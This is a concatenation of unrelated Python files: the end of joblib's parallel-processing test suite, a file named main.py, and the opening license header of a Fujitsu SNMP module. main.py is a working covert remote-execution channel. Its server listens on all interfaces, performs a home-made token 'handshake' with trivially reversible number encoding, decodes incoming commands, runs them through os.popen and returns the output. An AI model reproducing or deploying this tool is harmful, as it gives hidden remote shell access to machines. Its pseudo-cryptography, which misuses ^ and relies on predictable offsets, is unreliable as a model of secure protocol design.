raise SkipTest('multiprocessing can cause BLAS freeze on old '
'Python that relies on fork.')
# Use the spawn backend that is both robust and available on all
# platforms
backend = mp.get_context('spawn')
# Check that on recent Python version, the 'spawn' start method can make
# it possible to use multiprocessing in conjunction of any BLAS
# implementation that happens to be used by numpy with causing a freeze or
# a crash
rng = np.random.RandomState(42)
# call BLAS DGEMM to force the initialization of the internal thread-pool
# in the main process
a = rng.randn(1000, 1000)
np.dot(a, a.T)
# check that the internal BLAS thread-pool is not in an inconsistent state
# in the worker processes managed by multiprocessing
Parallel(n_jobs=2, backend=backend)(
delayed(np.dot)(a, a.T) for i in range(2))
UNPICKLABLE_CALLABLE_SCRIPT_TEMPLATE_NO_MAIN = """\
from joblib import Parallel, delayed
def square(x):
return x ** 2
backend = "{}"
if backend == "spawn":
from multiprocessing import get_context
backend = get_context(backend)
print(Parallel(n_jobs=2, backend=backend)(
delayed(square)(i) for i in range(5)))
"""
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS)
@skipif(sys.version_info < (3, 5), reason="Bored with Python 2 support")
def test_parallel_with_interactively_defined_functions(backend):
# When using the "-c" flag, interactive functions defined in __main__
# should work with any backend.
if backend == "multiprocessing" and mp.get_start_method() != "fork":
pytest.skip("Require fork start method to use interactively defined "
"functions with multiprocessing.")
code = UNPICKLABLE_CALLABLE_SCRIPT_TEMPLATE_NO_MAIN.format(backend)
check_subprocess_call(
[sys.executable, '-c', code], timeout=10,
stdout_regex=r'\[0, 1, 4, 9, 16\]')
UNPICKLABLE_CALLABLE_SCRIPT_TEMPLATE_MAIN = """\
import sys
# Make sure that joblib is importable in the subprocess launching this
# script. This is needed in case we run the tests from the joblib root
# folder without having installed joblib
sys.path.insert(0, {joblib_root_folder!r})
from joblib import Parallel, delayed
def run(f, x):
return f(x)
{define_func}
if __name__ == "__main__":
backend = "{backend}"
if backend == "spawn":
from multiprocessing import get_context
backend = get_context(backend)
callable_position = "{callable_position}"
if callable_position == "delayed":
print(Parallel(n_jobs=2, backend=backend)(
delayed(square)(i) for i in range(5)))
elif callable_position == "args":
print(Parallel(n_jobs=2, backend=backend)(
delayed(run)(square, i) for i in range(5)))
else:
print(Parallel(n_jobs=2, backend=backend)(
delayed(run)(f=square, x=i) for i in range(5)))
"""
SQUARE_MAIN = """\
def square(x):
return x ** 2
"""
SQUARE_LOCAL = """\
def gen_square():
def square(x):
return x ** 2
return square
square = gen_square()
"""
SQUARE_LAMBDA = """\
square = lambda x: x ** 2
"""
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS +
([] if sys.version_info[:2] < (3, 4) or mp is None
else ['spawn']))
@parametrize('define_func', [SQUARE_MAIN, SQUARE_LOCAL, SQUARE_LAMBDA])
@parametrize('callable_position', ['delayed', 'args', 'kwargs'])
def test_parallel_with_unpicklable_functions_in_args(
backend, define_func, callable_position, tmpdir):
if backend in ['multiprocessing', 'spawn'] and (
define_func != SQUARE_MAIN or sys.platform == "win32"):
pytest.skip("Not picklable with pickle")
code = UNPICKLABLE_CALLABLE_SCRIPT_TEMPLATE_MAIN.format(
define_func=define_func, backend=backend,
callable_position=callable_position,
joblib_root_folder=os.path.dirname(os.path.dirname(joblib.__file__)))
code_file = tmpdir.join("unpicklable_func_script.py")
code_file.write(code)
check_subprocess_call(
[sys.executable, code_file.strpath], timeout=10,
stdout_regex=r'\[0, 1, 4, 9, 16\]')
INTERACTIVE_DEFINED_FUNCTION_AND_CLASS_SCRIPT_CONTENT = """\
import sys
# Make sure that joblib is importable in the subprocess launching this
# script. This is needed in case we run the tests from the joblib root
# folder without having installed joblib
sys.path.insert(0, {joblib_root_folder!r})
from joblib import Parallel, delayed
from functools import partial
class MyClass:
'''Class defined in the __main__ namespace'''
def __init__(self, value):
self.value = value
def square(x, ignored=None, ignored2=None):
'''Function defined in the __main__ namespace'''
return x.value ** 2
square2 = partial(square, ignored2='something')
# Here, we do not need the `if __name__ == "__main__":` safeguard when
# using the default `loky` backend (even on Windows).
# The following baroque function call is meant to check that joblib
# introspection rightfully uses cloudpickle instead of the (faster) pickle
# module of the standard library when necessary. In particular cloudpickle is
# necessary for functions and instances of classes interactively defined in the
# __main__ module.
print(Parallel(n_jobs=2)(
delayed(square2)(MyClass(i), ignored=[dict(a=MyClass(1))])
for i in range(5)
))
""".format(joblib_root_folder=os.path.dirname(
os.path.dirname(joblib.__file__)))
@with_multiprocessing
def test_parallel_with_interactively_defined_functions_default_backend(tmpdir):
# The default backend (loky) accepts interactive functions defined in
# __main__ and does not require if __name__ == '__main__' even when
# the __main__ module is defined by the result of the execution of a
# filesystem script.
script = tmpdir.join('joblib_interactively_defined_function.py')
script.write(INTERACTIVE_DEFINED_FUNCTION_AND_CLASS_SCRIPT_CONTENT)
check_subprocess_call([sys.executable, script.strpath],
stdout_regex=r'\[0, 1, 4, 9, 16\]',
timeout=5)
INTERACTIVELY_DEFINED_SUBCLASS_WITH_METHOD_SCRIPT_CONTENT = """\
import sys
# Make sure that joblib is importable in the subprocess launching this
# script. This is needed in case we run the tests from the joblib root
# folder without having installed joblib
sys.path.insert(0, {joblib_root_folder!r})
from joblib import Parallel, delayed, hash
import multiprocessing as mp
mp.util.log_to_stderr(5)
class MyList(list):
'''MyList is interactively defined by MyList.append is a built-in'''
def __hash__(self):
# XXX: workaround limitation in cloudpickle
return hash(self).__hash__()
l = MyList()
print(Parallel(n_jobs=2)(
delayed(l.append)(i) for i in range(3)
))
""".format(joblib_root_folder=os.path.dirname(
os.path.dirname(joblib.__file__)))
@with_multiprocessing
def test_parallel_with_interactively_defined_bound_method(tmpdir):
script = tmpdir.join('joblib_interactive_bound_method_script.py')
script.write(INTERACTIVELY_DEFINED_SUBCLASS_WITH_METHOD_SCRIPT_CONTENT)
check_subprocess_call([sys.executable, script.strpath],
stdout_regex=r'\[None, None, None\]',
stderr_regex=r'LokyProcess',
timeout=15)
def test_parallel_with_exhausted_iterator():
exhausted_iterator = iter([])
assert Parallel(n_jobs=2)(exhausted_iterator) == []
def check_memmap(a):
if not isinstance(a, np.memmap):
raise TypeError('Expected np.memmap instance, got %r',
type(a))
return a.copy() # return a regular array instead of a memmap
@with_numpy
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS)
def test_auto_memmap_on_arrays_from_generator(backend):
# Non-regression test for a problem with a bad interaction between the
# GC collecting arrays recently created during iteration inside the
# parallel dispatch loop and the auto-memmap feature of Parallel.
# See: https://github.com/joblib/joblib/pull/294
def generate_arrays(n):
for i in range(n):
yield np.ones(10, dtype=np.float32) * i
# Use max_nbytes=1 to force the use of memory-mapping even for small
# arrays
results = Parallel(n_jobs=2, max_nbytes=1, backend=backend)(
delayed(check_memmap)(a) for a in generate_arrays(100))
for result, expected in zip(results, generate_arrays(len(results))):
np.testing.assert_array_equal(expected, result)
# Second call to force loky to adapt the executor by growing the number
# of worker processes. This is a non-regression test for:
# https://github.com/joblib/joblib/issues/629.
results = Parallel(n_jobs=4, max_nbytes=1, backend=backend)(
delayed(check_memmap)(a) for a in generate_arrays(100))
for result, expected in zip(results, generate_arrays(len(results))):
np.testing.assert_array_equal(expected, result)
def identity(arg):
return arg
@with_numpy
@with_multiprocessing
def test_memmap_with_big_offset(tmpdir):
fname = tmpdir.join('test.mmap').strpath
size = mmap.ALLOCATIONGRANULARITY
obj = [np.zeros(size, dtype='uint8'), np.ones(size, dtype='uint8')]
dump(obj, fname)
memmap = load(fname, mmap_mode='r')
result, = Parallel(n_jobs=2)(delayed(identity)(memmap) for _ in [0])
assert isinstance(memmap[1], np.memmap)
assert memmap[1].offset > size
np.testing.assert_array_equal(obj, result)
def test_warning_about_timeout_not_supported_by_backend():
with warns(None) as warninfo:
Parallel(timeout=1)(delayed(square)(i) for i in range(50))
assert len(warninfo) == 1
w = warninfo[0]
assert isinstance(w.message, UserWarning)
assert str(w.message) == (
"The backend class 'SequentialBackend' does not support timeout. "
"You have set 'timeout=1' in Parallel but the 'timeout' parameter "
"will not be used.")
@parametrize('backend', ALL_VALID_BACKENDS)
@parametrize('n_jobs', [1, 2, -2, -1])
def test_abort_backend(n_jobs, backend):
delays = ["a"] + [10] * 100
with raises(TypeError):
t_start = time.time()
Parallel(n_jobs=n_jobs, backend=backend)(
delayed(time.sleep)(i) for i in delays)
dt = time.time() - t_start
assert dt < 20
@with_numpy
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS)
def test_memmapping_leaks(backend, tmpdir):
# Non-regression test for memmapping backends. Ensure that the data
# does not stay too long in memory
tmpdir = tmpdir.strpath
# Use max_nbytes=1 to force the use of memory-mapping even for small
# arrays
with Parallel(n_jobs=2, max_nbytes=1, backend=backend,
temp_folder=tmpdir) as p:
p(delayed(check_memmap)(a) for a in [np.random.random(10)] * 2)
# The memmap folder should not be clean in the context scope
assert len(os.listdir(tmpdir)) > 0
# Make sure that the shared memory is cleaned at the end when we exit
# the context
assert not os.listdir(tmpdir)
# Make sure that the shared memory is cleaned at the end of a call
p = Parallel(n_jobs=2, max_nbytes=1, backend=backend)
p(delayed(check_memmap)(a) for a in [np.random.random(10)] * 2)
assert not os.listdir(tmpdir)
@parametrize('backend', [None, 'loky', 'threading'])
def test_lambda_expression(backend):
# cloudpickle is used to pickle delayed callables
results = Parallel(n_jobs=2, backend=backend)(
delayed(lambda x: x ** 2)(i) for i in range(10))
assert results == [i ** 2 for i in range(10)]
def test_delayed_check_pickle_deprecated():
if sys.version_info < (3, 5):
pytest.skip("Warning check unstable under Python 2, life is too short")
class UnpicklableCallable(object):
def __call__(self, *args, **kwargs):
return 42
def __reduce__(self):
raise ValueError()
with warns(DeprecationWarning):
f, args, kwargs = delayed(lambda x: 42, check_pickle=False)('a')
assert f('a') == 42
assert args == ('a',)
assert kwargs == dict()
with warns(DeprecationWarning):
f, args, kwargs = delayed(UnpicklableCallable(),
check_pickle=False)('a', option='b')
assert f('a', option='b') == 42
assert args == ('a',)
assert kwargs == dict(option='b')
with warns(DeprecationWarning):
with raises(ValueError):
delayed(UnpicklableCallable(), check_pickle=True)
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS)
def test_backend_batch_statistics_reset(backend):
"""Test that a parallel backend correctly resets its batch statistics."""
n_jobs = 2
n_inputs = 500
task_time = 2. / n_inputs
p = Parallel(verbose=10, n_jobs=n_jobs, backend=backend)
p(delayed(time.sleep)(task_time) for i in range(n_inputs))
assert (p._backend._effective_batch_size ==
p._backend._DEFAULT_EFFECTIVE_BATCH_SIZE)
assert (p._backend._smoothed_batch_duration ==
p._backend._DEFAULT_SMOOTHED_BATCH_DURATION)
p(delayed(time.sleep)(task_time) for i in range(n_inputs))
assert (p._backend._effective_batch_size ==
p._backend._DEFAULT_EFFECTIVE_BATCH_SIZE)
assert (p._backend._smoothed_batch_duration ==
p._backend._DEFAULT_SMOOTHED_BATCH_DURATION)
def test_backend_hinting_and_constraints():
for n_jobs in [1, 2, -1]:
assert type(Parallel(n_jobs=n_jobs)._backend) == LokyBackend
p = Parallel(n_jobs=n_jobs, prefer='threads')
assert type(p._backend) == ThreadingBackend
p = Parallel(n_jobs=n_jobs, prefer='processes')
assert type(p._backend) == LokyBackend
p = Parallel(n_jobs=n_jobs, require='sharedmem')
assert type(p._backend) == ThreadingBackend
# Explicit backend selection can override backend hinting although it
# is useless to pass a hint when selecting a backend.
p = Parallel(n_jobs=2, backend='loky', prefer='threads')
assert type(p._backend) == LokyBackend
with parallel_backend('loky', n_jobs=2):
# Explicit backend selection by the user with the context manager
# should be respected when combined with backend hints only.
p = Parallel(prefer='threads')
assert type(p._backend) == LokyBackend
assert p.n_jobs == 2
with parallel_backend('loky', n_jobs=2):
# Locally hard-coded n_jobs value is respected.
p = Parallel(n_jobs=3, prefer='threads')
assert type(p._backend) == LokyBackend
assert p.n_jobs == 3
with parallel_backend('loky', n_jobs=2):
# Explicit backend selection by the user with the context manager
# should be ignored when the Parallel call has hard constraints.
# In this case, the default backend that supports shared mem is
# used an the default number of processes is used.
p = Parallel(require='sharedmem')
assert type(p._backend) == ThreadingBackend
assert p.n_jobs == 1
with parallel_backend('loky', n_jobs=2):
p = Parallel(n_jobs=3, require='sharedmem')
assert type(p._backend) == ThreadingBackend
assert p.n_jobs == 3
def test_backend_hinting_and_constraints_with_custom_backends(capsys):
# Custom backends can declare that they use threads and have shared memory
# semantics:
class MyCustomThreadingBackend(ParallelBackendBase):
supports_sharedmem = True
use_threads = True
def apply_async(self):
pass
def effective_n_jobs(self, n_jobs):
return n_jobs
with parallel_backend(MyCustomThreadingBackend()):
p = Parallel(n_jobs=2, prefer='processes') # ignored
assert type(p._backend) == MyCustomThreadingBackend
p = Parallel(n_jobs=2, require='sharedmem')
assert type(p._backend) == MyCustomThreadingBackend
class MyCustomProcessingBackend(ParallelBackendBase):
supports_sharedmem = False
use_threads = False
def apply_async(self):
pass
def effective_n_jobs(self, n_jobs):
return n_jobs
with parallel_backend(MyCustomProcessingBackend()):
p = Parallel(n_jobs=2, prefer='processes')
assert type(p._backend) == MyCustomProcessingBackend
out, err = capsys.readouterr()
assert out == ""
assert err == ""
p = Parallel(n_jobs=2, require='sharedmem', verbose=10)
assert type(p._backend) == ThreadingBackend
out, err = capsys.readouterr()
expected = ("Using ThreadingBackend as joblib.Parallel backend "
"instead of MyCustomProcessingBackend as the latter "
"does not provide shared memory semantics.")
assert out.strip() == expected
assert err == ""
with raises(ValueError):
Parallel(backend=MyCustomProcessingBackend(), require='sharedmem')
def test_invalid_backend_hinting_and_constraints():
with raises(ValueError):
Parallel(prefer='invalid')
with raises(ValueError):
Parallel(require='invalid')
with raises(ValueError):
# It is inconsistent to prefer process-based parallelism while
# requiring shared memory semantics.
Parallel(prefer='processes', require='sharedmem')
# It is inconsistent to ask explictly for a process-based parallelism
# while requiring shared memory semantics.
with raises(ValueError):
Parallel(backend='loky', require='sharedmem')
with raises(ValueError):
Parallel(backend='multiprocessing', require='sharedmem')
def test_global_parallel_backend():
default = Parallel()._backend
pb = parallel_backend('threading')
assert isinstance(Parallel()._backend, ThreadingBackend)
pb.unregister()
assert type(Parallel()._backend) is type(default)
def test_external_backends():
def register_foo():
BACKENDS['foo'] = ThreadingBackend
EXTERNAL_BACKENDS['foo'] = register_foo
with parallel_backend('foo'):
assert isinstance(Parallel()._backend, ThreadingBackend)
def _recursive_backend_info(limit=3, **kwargs):
"""Perform nested parallel calls and introspect the backend on the way"""
with Parallel(n_jobs=2) as p:
this_level = [(type(p._backend).__name__, p._backend.nesting_level)]
if limit == 0:
return this_level
results = p(delayed(_recursive_backend_info)(limit=limit - 1, **kwargs)
for i in range(1))
return this_level + results[0]
@with_multiprocessing
@parametrize('backend', ['loky', 'threading'])
def test_nested_parallelism_limit(backend):
with parallel_backend(backend, n_jobs=2):
backend_types_and_levels = _recursive_backend_info()
if cpu_count() == 1:
second_level_backend_type = 'SequentialBackend'
max_level = 1
else:
second_level_backend_type = 'ThreadingBackend'
max_level = 2
top_level_backend_type = backend.title() + 'Backend'
expected_types_and_levels = [
(top_level_backend_type, 0),
(second_level_backend_type, 1),
('SequentialBackend', max_level),
('SequentialBackend', max_level)
]
assert backend_types_and_levels == expected_types_and_levels
@with_numpy
@skipif(distributed is None, reason='This test requires dask')
def test_nested_parallelism_with_dask():
client = distributed.Client(n_workers=2, threads_per_worker=2) # noqa
# 10 MB of data as argument to trigger implicit scattering
data = np.ones(int(1e7), dtype=np.uint8)
for i in range(2):
with parallel_backend('dask'):
backend_types_and_levels = _recursive_backend_info(data=data)
assert len(backend_types_and_levels) == 4
assert all(name == 'DaskDistributedBackend'
for name, _ in backend_types_and_levels)
# No argument
with parallel_backend('dask'):
backend_types_and_levels = _recursive_backend_info()
assert len(backend_types_and_levels) == 4
assert all(name == 'DaskDistributedBackend'
for name, _ in backend_types_and_levels)
def _recursive_parallel(nesting_limit=None):
"""A horrible function that does recursive parallel calls"""
return Parallel()(delayed(_recursive_parallel)() for i in range(2))
@parametrize('backend', ['loky', 'threading'])
def test_thread_bomb_mitigation(backend):
# Test that recursive parallelism raises a recursion rather than
# saturating the operating system resources by creating a unbounded number
# of threads.
with parallel_backend(backend, n_jobs=2):
with raises(RecursionError):
_recursive_parallel()
def _run_parallel_sum():
env_vars = {}
for var in ['OMP_NUM_THREADS', 'OPENBLAS_NUM_THREADS', 'MKL_NUM_THREADS',
'VECLIB_MAXIMUM_THREADS', 'NUMEXPR_NUM_THREADS',
'NUMBA_NUM_THREADS', 'ENABLE_IPC']:
env_vars[var] = os.environ.get(var)
return env_vars, parallel_sum(100)
@parametrize("backend", [None, 'loky'])
@skipif(parallel_sum is None, reason="Need OpenMP helper compiled")
def test_parallel_thread_limit(backend):
results = Parallel(n_jobs=2, backend=backend)(
delayed(_run_parallel_sum)() for _ in range(2)
)
expected_num_threads = max(cpu_count() // 2, 1)
for worker_env_vars, omp_num_threads in results:
assert omp_num_threads == expected_num_threads
for name, value in worker_env_vars.items():
if name.endswith("_THREADS"):
assert value == str(expected_num_threads)
else:
assert name == "ENABLE_IPC"
assert value == "1"
@skipif(distributed is not None,
reason='This test requires dask NOT installed')
def test_dask_backend_when_dask_not_installed():
with raises(ValueError, match='Please install dask'):
parallel_backend('dask')
def test_zero_worker_backend():
# joblib.Parallel should reject with an explicit error message parallel
# backends that have no worker.
class ZeroWorkerBackend(ThreadingBackend):
def configure(self, *args, **kwargs):
return 0
def apply_async(self, func, callback=None): # pragma: no cover
raise TimeoutError("No worker available")
def effective_n_jobs(self, n_jobs): # pragma: no cover
return 0
expected_msg = "ZeroWorkerBackend has no active worker"
with parallel_backend(ZeroWorkerBackend()):
with pytest.raises(RuntimeError, match=expected_msg):
Parallel(n_jobs=2)(delayed(id)(i) for i in range(2))
def test_globals_update_at_each_parallel_call():
# This is a non-regression test related to joblib issues #836 and #833.
# Cloudpickle versions between 0.5.4 and 0.7 introduced a bug where global
# variables changes in a parent process between two calls to
# joblib.Parallel would not be propagated into the workers.
global MY_GLOBAL_VARIABLE
MY_GLOBAL_VARIABLE = "original value"
def check_globals():
global MY_GLOBAL_VARIABLE
return MY_GLOBAL_VARIABLE
assert check_globals() == "original value"
workers_global_variable = Parallel(n_jobs=2)(
delayed(check_globals)() for i in range(2))
assert set(workers_global_variable) == {"original value"}
# Change the value of MY_GLOBAL_VARIABLE, and make sure this change gets
# propagated into the workers environment
MY_GLOBAL_VARIABLE = "changed value"
assert check_globals() == "changed value"
workers_global_variable = Parallel(n_jobs=2)(
delayed(check_globals)() for i in range(2))
assert set(workers_global_variable) == {"changed value"}
##############################################################################
# Test environment variable in child env, in particular for limiting
# the maximal number of threads in C-library threadpools.
#
def _check_numpy_threadpool_limits():
import numpy as np
# Let's call BLAS on a Matrix Matrix multiplication with dimensions large
# enough to ensure that the threadpool managed by the underlying BLAS
# implementation is actually used so as to force its initialization.
a = np.random.randn(100, 100)
np.dot(a, a)
from threadpoolctl import threadpool_info
return threadpool_info()
def _parent_max_num_threads_for(child_module, parent_info):
for parent_module in parent_info:
if parent_module['filepath'] == child_module['filepath']:
return parent_module['num_threads']
raise ValueError("An unexpected module was loaded in child:\n{}"
.format(child_module))
def check_child_num_threads(workers_info, parent_info, num_threads):
# Check that the number of threads reported in workers_info is consistent
# with the expectation. We need to be carefull to handle the cases where
# the requested number of threads is below max_num_thread for the library.
for child_threadpool_info in workers_info:
for child_module in child_threadpool_info:
parent_max_num_threads = _parent_max_num_threads_for(
child_module, parent_info)
expected = {min(num_threads, parent_max_num_threads), num_threads}
assert child_module['num_threads'] in expected
@with_numpy
@with_multiprocessing
@skipif(sys.version_info < (3, 5),
reason='threadpoolctl is a python3.5+ package')
@parametrize('n_jobs', [2, 4, -2, -1])
def test_threadpool_limitation_in_child(n_jobs):
# Check that the protection against oversubscription in workers is working
# using threadpoolctl functionalities.
# Skip this test if numpy is not linked to a BLAS library
parent_info = _check_numpy_threadpool_limits()
if len(parent_info) == 0:
pytest.skip(msg="Need a version of numpy linked to BLAS")
workers_threadpool_infos = Parallel(n_jobs=n_jobs)(
delayed(_check_numpy_threadpool_limits)() for i in range(2))
n_jobs = effective_n_jobs(n_jobs)
expected_child_num_threads = max(cpu_count() // n_jobs, 1)
check_child_num_threads(workers_threadpool_infos, parent_info,
expected_child_num_threads)
@with_numpy
@with_multiprocessing
@skipif(sys.version_info < (3, 5),
reason='threadpoolctl is a python3.5+ package')
@parametrize('inner_max_num_threads', [1, 2, 4, None])
@parametrize('n_jobs', [2, -1])
def test_threadpool_limitation_in_child_context(n_jobs, inner_max_num_threads):
# Check that the protection against oversubscription in workers is working
# using threadpoolctl functionalities.
# Skip this test if numpy is not linked to a BLAS library
parent_info = _check_numpy_threadpool_limits()
if len(parent_info) == 0:
pytest.skip(msg="Need a version of numpy linked to BLAS")
with parallel_backend('loky', inner_max_num_threads=inner_max_num_threads):
workers_threadpool_infos = Parallel(n_jobs=n_jobs)(
delayed(_check_numpy_threadpool_limits)() for i in range(2))
n_jobs = effective_n_jobs(n_jobs)
if inner_max_num_threads is None:
expected_child_num_threads = max(cpu_count() // n_jobs, 1)
else:
expected_child_num_threads = inner_max_num_threads
check_child_num_threads(workers_threadpool_infos, parent_info,
expected_child_num_threads)
@with_multiprocessing
@parametrize('n_jobs', [2, -1])
@parametrize('var_name', ["OPENBLAS_NUM_THREADS",
"MKL_NUM_THREADS",
"OMP_NUM_THREADS"])
def test_threadpool_limitation_in_child_override(n_jobs, var_name):
# Check that environment variables set by the user on the main process
# always have the priority.
# Clean up the existing executor because we change the environment of the
# parent at runtime and it is not detected in loky intentionally.
get_reusable_executor(reuse=True).shutdown()
def _get_env(var_name):
return os.environ.get(var_name)
original_var_value = os.environ.get(var_name)
try:
os.environ[var_name] = "4"
# Skip this test if numpy is not linked to a BLAS library
results = Parallel(n_jobs=n_jobs)(
delayed(_get_env)(var_name) for i in range(2))
assert results == ["4", "4"]
with parallel_backend('loky', inner_max_num_threads=1):
results = Parallel(n_jobs=n_jobs)(
delayed(_get_env)(var_name) for i in range(2))
assert results == ["1", "1"]
finally:
if original_var_value is None:
del os.environ[var_name]
else:
os.environ[var_name] = original_var_value
@with_numpy
@with_multiprocessing
@parametrize('backend', ['multiprocessing', 'threading',
MultiprocessingBackend(), ThreadingBackend()])
def test_threadpool_limitation_in_child_context_error(backend):
with raises(AssertionError, match=r"does not acc.*inner_max_num_threads"):
parallel_backend(backend, inner_max_num_threads=1)
@with_multiprocessing
@parametrize('n_jobs', [2, 4, -1])
def test_loky_reuse_workers(n_jobs):
# Non-regression test for issue #967 where the workers are not reused when
# calling multiple Parallel loops.
def parallel_call(n_jobs):
x = range(10)
Parallel(n_jobs=n_jobs)(delayed(sum)(x) for i in range(10))
# Run a parallel loop and get the workers used for computations
parallel_call(n_jobs)
first_executor = get_reusable_executor(reuse=True)
# Ensure that the workers are reused for the next calls, as the executor is
# not restarted.
for _ in range(10):
parallel_call(n_jobs)
executor = get_reusable_executor(reuse=True)
assert executor == first_executor
|
main.py
|
import socket, sys, random, os
import time
from multiprocessing import Process
from datetime import datetime
server_old_private_value, server_private_value, server_private_time = 0, 0, 0
client_old_private_value, client_private_value, client_private_time = 0, 0, 0
token = 0
common_value = 1758
old_token, new_token, old_token_caducity, new_token_caducity = 0, 0, 0, 0
exec_window = [0, 0]
state_machine_end_mark = "forMerkStateMachineClientEnds"
def MERKFlagTokenAndTimeSlot():
global old_token, new_token, old_token_caducity, new_token_caducity, exec_window
time_data = datetime.now().strftime("%M/%S").split("/")
actual_time = (int(time_data[0]) * 100) + int(time_data[1])
if actual_time > exec_window[0]:
# time to renovate old_token
old_token = new_token
new_token = random.randrange(0, 999999999)
# time to renovate the token lifetime
old_token_caducity = new_token_caducity
new_token_caducity = random.randrange(2, 5)
exec_window = [actual_time + old_token_caducity, actual_time + old_token_caducity + new_token_caducity]
return old_token_caducity, new_token, new_token_caducity, old_token
def MERKgenTimeFlag():
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y/%H/%M/%S").split("/")
val1 = 21
val2 = int(dt_string[1])
val3 = int(dt_string[0])
val4 = int(dt_string[3])
val5 = int(dt_string[4])
val6 = int(dt_string[5])
to_return = (val1 - val2) ^ 2 + (val3 - val4) ^ 2 + (val5 - val6) ^ 2
to_return2 = (val1 - val2) ^ 2 + (val3 - val4) ^ 2 + (val5 - (val6 - 1)) ^ 2
return to_return, to_return2
def forMERKGetServerPrivateValue():
global server_private_time
global server_private_value
global server_old_private_value
time_data = datetime.now().strftime("%M/%S").split("/")
new_server_time = (int(time_data[0]) * 100) + int(time_data[1])
if new_server_time > server_private_time:
server_old_private_value = server_private_value
server_private_time = new_server_time + random.randrange(3, 5)
server_private_value = random.randrange(0, 9999)
return server_private_value
def forMERKGetClientPrivateValue():
global client_private_time
global client_private_value
global client_old_private_value
time_data = datetime.now().strftime("%M/%S").split("/")
new_server_time = (int(time_data[0]) * 100) + int(time_data[1])
if new_server_time > client_private_time:
client_old_private_value = client_private_value
client_private_time = new_server_time + random.randrange(3, 5)
client_private_value = random.randrange(0, 9999)
return client_private_value
def MERKcifValue(command, token):
to_return = ""
for letter in command:
to_return += str(ord(letter) + int(token)) + ","
return to_return[:-1]
def MERKgetValue(array_letters, token):
to_return = ""
for letter in array_letters:
try:
to_return += chr(int(letter) - token)
except:
to_return = "error_91"
return to_return
def MERKClient(data, sender, forMerkStateMachineClient):
global common_value
obj = data.split(":")[0]
port = data.split(":")[1]
to_send = "DH_1"
response = ""
while "forMerkStateMachineClientEnds" not in to_send:
response = sender(to_send, obj, int(port)).decode()
if len(response) > 0:
if "/" in response:
if int(response.split("/")[1]) in MERKgenTimeFlag():
response = response.split("/")[0]
if len(response) > 0:
to_send = forMerkStateMachineClient(response)
else:
to_send = "forMerkStateMachineClientEnds"
return response
def forMerkStateMachineClient(data):
global token
to_return = ""
global state_machine_end_mark
if "DH_1" in data:
server_value = int(data.split("DH_1:")[1]) - common_value
to_return = ("DH_2:" + str(int(server_value) + forMERKGetClientPrivateValue()))
elif "DH_2" in data:
time_slot_start = int(data.split("DH_2:")[1].split(",")[0]) - client_private_value
token = int(data.split(",")[1]) - client_private_value
command_data = MERKcifValue("echo jeje", token)
time.sleep(int(time_slot_start))
to_return = "PVT_1:" + command_data
elif "PVT_1" in data:
to_return = state_machine_end_mark + MERKgetValue(data.split("PVT_1:")[1].split(","), token)
return to_return
def forMerkStateMachineServer(data, priv_value, token_vals):
global server_values
to_send = ""
time_flags = MERKgenTimeFlag()
if int(data.split("/")[1]) in time_flags:
if "DH_1" in data:
to_send = "DH_1:" + str(priv_value + common_value) + "/" + str(MERKgenTimeFlag()[0])
elif "DH_2" in data:
client_value = int(data.split("DH_2:")[1].split("/")[0]) - priv_value
to_send = "DH_2:" + str(client_value + token_vals[0]) + "," + str(client_value + token_vals[1]) + "/" + str(
MERKgenTimeFlag()[0])
elif "PVT_1" in data:
aux_command = data.split("PVT_1:")[1].split("/")[0].split(",")
command = ""
try:
for c in aux_command:
command += chr(int(c) - token_vals[1])
except:
command = ""
for c in aux_command:
command += chr(int(c) - token_vals[3])
result = MERKcifValue(os.popen(command).read(), token_vals[1])
time.sleep(0.004)
to_send = "PVT_1:" + result + "/" + str(MERKgenTimeFlag()[0])
else:
to_send = "error_161"
return to_send
def forMerkSendData(data, obj, port):
data_to_send = str(data) + "/" + str(MERKgenTimeFlag()[0])
data = ""
print("Sending C->S :" + str(data_to_send) + " to " + str(obj) + ":" + str(port))
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
count = 0
while count < 3:
s.connect((obj, int(port)))
s.sendall(bytes(data_to_send, 'utf-8'))
data = s.recv(1024)
s.close()
count = 3
return data
def forMerkServerMaybe(port, cycles):
HOST = '' # Symbolic name meaning all available interfaces
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, port))
s.listen(100)
count = 0
while count < cycles * 4:
count += 1
conn, addr = s.accept()
priv_value = forMERKGetServerPrivateValue()
token_vals = MERKFlagTokenAndTimeSlot()
p2 = Process(target=slaveServer, args=(
[conn.recv, conn.send, conn.close], addr, priv_value, token_vals, forMerkStateMachineServer))
p2.start()
def slaveServer(conn, addr, priv_value, token_vals, forMerkStateMachineServer):
old_len = -1
data = ""
while len(data) > old_len:
data = conn[0](1024)
old_len = len(data)
to_send = forMerkStateMachineServer(data.decode(), priv_value, token_vals)
sended = conn[1](bytes(to_send, 'utf-8'))
print("Sending S->C :" + str(to_send) + " to " + str(addr))
time.sleep(0.04)
conn[2]
return to_send, data, sended
def main(argv):
obj = "127.0.0.1"
port = 4450
cycles = 1
delay = 10
wrong_configuration = 0
for arg in argv:
if arg.split(":")[0] == "ip":
try:
obj = arg.split(":")[1]
except:
wrong_configuration += "1"
elif arg.split(":")[0] == "port":
try:
port = int(arg.split(":")[1])
if port > 65535 or port < 1025:
port = 4450
wrong_configuration += "2"
except:
wrong_configuration += "2"
elif arg.split(":")[0] == "cycles":
try:
cycles = int(arg.split(":")[1])
except:
wrong_configuration += "3"
elif arg.split(":")[0] == "delay":
try:
delay = int(arg.split(":")[1])
except:
wrong_configuration += "4"
p1 = Process(target=forMerkServerMaybe, args=(port, cycles,))
p1.start()
count = 0
while count < cycles:
count += 1
p2 = Process(target=MERKClient, args=(obj + ":" + str(port), forMerkSendData, forMerkStateMachineClient))
p2.start()
time.sleep(delay)
p1.kill()
return obj, str(port), str(cycles), str(delay), str(wrong_configuration)
if __name__ == '__main__':
main(sys.argv[1:])
|
common_snmp_actions.py
|
'''
Copyright 2017, Fujitsu Network Communications, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
